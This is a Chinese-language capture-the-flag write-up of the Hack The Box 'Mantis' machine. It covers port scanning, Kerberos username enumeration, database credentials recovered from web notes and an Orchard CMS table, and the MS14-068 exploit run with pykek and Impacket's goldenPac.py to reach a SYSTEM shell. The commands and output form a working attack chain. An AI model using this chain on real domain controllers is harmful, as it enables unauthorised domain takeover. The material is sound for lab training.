端口扫描

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 20:24 CST
Warning: 10.10.10.52 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.52
Host is up (0.078s latency).
Not shown: 65463 closed tcp ports (reset), 45 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1337/tcp open waste
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49162/tcp open unknown
49166/tcp open unknown
49175/tcp open unknown
50255/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 17.27 seconds
┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,47001,49152,49153,49154,49155,49157,49158,49162,49166,49175,50255 10.10.10.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 20:28 CST
Nmap scan report for 10.10.10.52
Host is up (0.068s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-26 12:17:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2024-09-26T12:19:01+00:00; -10m59s from scanner time.
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-26T12:10:47
|_Not valid after: 2054-09-26T12:10:47
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tossed Salad - Blog
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info:
| 10.10.10.52:50255:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 50255
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-26T12:10:47
|_Not valid after: 2054-09-26T12:10:47
|_ssl-date: 2024-09-26T12:19:01+00:00; -10m59s from scanner time.
| ms-sql-ntlm-info:
| 10.10.10.52:50255:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows Vista or Windows 7 SP1 (96%), Microsoft Windows Vista SP0 - SP2, Windows Server 2008, or Windows 7 Ultimate (96%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (96%), Microsoft Windows Vista Business (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 23m18s, deviation: 1h30m44s, median: -10m59s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2024-09-26T08:18:54-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-09-26T12:18:51
|_ start_date: 2024-09-26T12:10:42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.55 seconds

添加hosts

Enum

探测了一下DNS,smb,ldap都没有结果

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ kerbrute userenum /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -d htb.local --dc 10.10.10.52

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/26/24 - Ronnie Flathers @ropnop

2024/09/26 20:49:48 > Using KDC(s):
2024/09/26 20:49:48 > 10.10.10.52:88

2024/09/26 20:49:53 > [+] VALID USERNAME: james@htb.local
2024/09/26 20:50:08 > [+] VALID USERNAME: James@htb.local
2024/09/26 20:50:33 > [+] VALID USERNAME: administrator@htb.local
2024/09/26 20:50:47 > [+] VALID USERNAME: mantis@htb.local
2024/09/26 20:51:38 > [+] VALID USERNAME: JAMES@htb.local
2024/09/26 20:53:53 > [+] VALID USERNAME: Administrator@htb.local

能列举出这几个用户名

1337和8080都开着web服务,都是IIS,稍微扫描一下目录

1337有一个/secure_notes/目录,第一个是一个文本,告知了安装了MSSQL2014并且创建了”admin”账户,8080开的是一个OrchardCMS服务,并且文件名base64解码之后是m$$ql_S@_P@ssW0rd!,猜测是数据库密码

并且页面的最底下还有几行字,但是暂时不清楚有什么用处

OrchardCMS有一个无关紧要的CSS,先放一边。连接数据库查看

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ mssqlclient.py admin@10.10.10.52
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL (admin admin@master)>

数据有点多,入坑了dbeaver,真好用(赞赏)。说一下使用肯能遇到的问题,首先需要sudo运行安装一下连接驱动。然后如果显示TLS版本问题那么更改使用的jdk对应的/conf/security/java.security,搜索jdk.tls.disabledAlgorithms=SSLv3然后将其中的TLSv1, TLSv1.1配置删除掉即可

在blog_Orchard_Users_UserPartRecord表中找到了james用户的密码J@m3s_P@ssW0rd!

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' --shares
SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.52 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd!
SMB 10.10.10.52 445 MANTIS [+] Enumerated shares
SMB 10.10.10.52 445 MANTIS Share Permissions Remark
SMB 10.10.10.52 445 MANTIS ----- ----------- ------
SMB 10.10.10.52 445 MANTIS ADMIN$ Remote Admin
SMB 10.10.10.52 445 MANTIS C$ Default share
SMB 10.10.10.52 445 MANTIS IPC$ Remote IPC
SMB 10.10.10.52 445 MANTIS NETLOGON READ Logon server share
SMB 10.10.10.52 445 MANTIS SYSVOL READ Logon server share

然而进行一番枚举之后,没有任何有用的消息。

MS14-068

进行一个域的信息探测,可以发现版本是server 2008 R2,是比较老了

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ ldapdomaindump mantis.htb.local -u 'mantis.htb.local\james' -p 'J@m3s_P@ssW0rd!' -n 10.10.10.52

目前拥有了一对域用户的凭证,可以尝试MS14-068

需要域用户的sid来生成黄金票据,在生成的user.json能找到

S-1-5-21-4220043660-4019079961-2895681657-1103

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains git clone https://github.com/mubix/pykek.git
┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:

运行可能会报像是这样的错

sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
File "ms14-068.py", line 48, in sploit
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
File "/home/mikannse/tools/domain/pykek/kek/krb5.py", line 431, in decrypt_as_rep
return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)
File "/home/mikannse/tools/domain/pykek/kek/krb5.py", line 419, in _decrypt_rep
rep = decode(data, asn1Spec=spec)[0]
File "/home/mikannse/tools/domain/pykek/pyasn1/codec/ber/decoder.py", line 79

这是时钟问题,调整时钟后解决

┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ sudo timedatectl set-ntp off

┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ sudo rdate -n 10.10.10.52
Thu Sep 26 23:48:20 CST 2024
┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:
[+] Building AS-REQ for mantis.htb.local... Done!
[+] Sending AS-REQ to mantis.htb.local... Done!
[+] Receiving AS-REP from mantis.htb.local... Done!
[+] Parsing AS-REP from mantis.htb.local... Done!
[+] Building TGS-REQ for mantis.htb.local... Done!
[+] Sending TGS-REQ to mantis.htb.local... Done!
[+] Receiving TGS-REP from mantis.htb.local... Done!
[+] Parsing TGS-REP from mantis.htb.local... Done!
[+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!

获取到了james的黄金票据,传递票据来获取shell

┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis.htb.local'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
/usr/share/doc/python3-impacket/examples/goldenPac.py:721: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
/usr/share/doc/python3-impacket/examples/goldenPac.py:747: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file WXBAGAqh.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service vxAb on mantis.htb.local.....
[*] Starting service vxAb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

碎碎念

主要是了解一下这个漏洞,虽然是比较老的洞了

具体可见: https://learn.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-068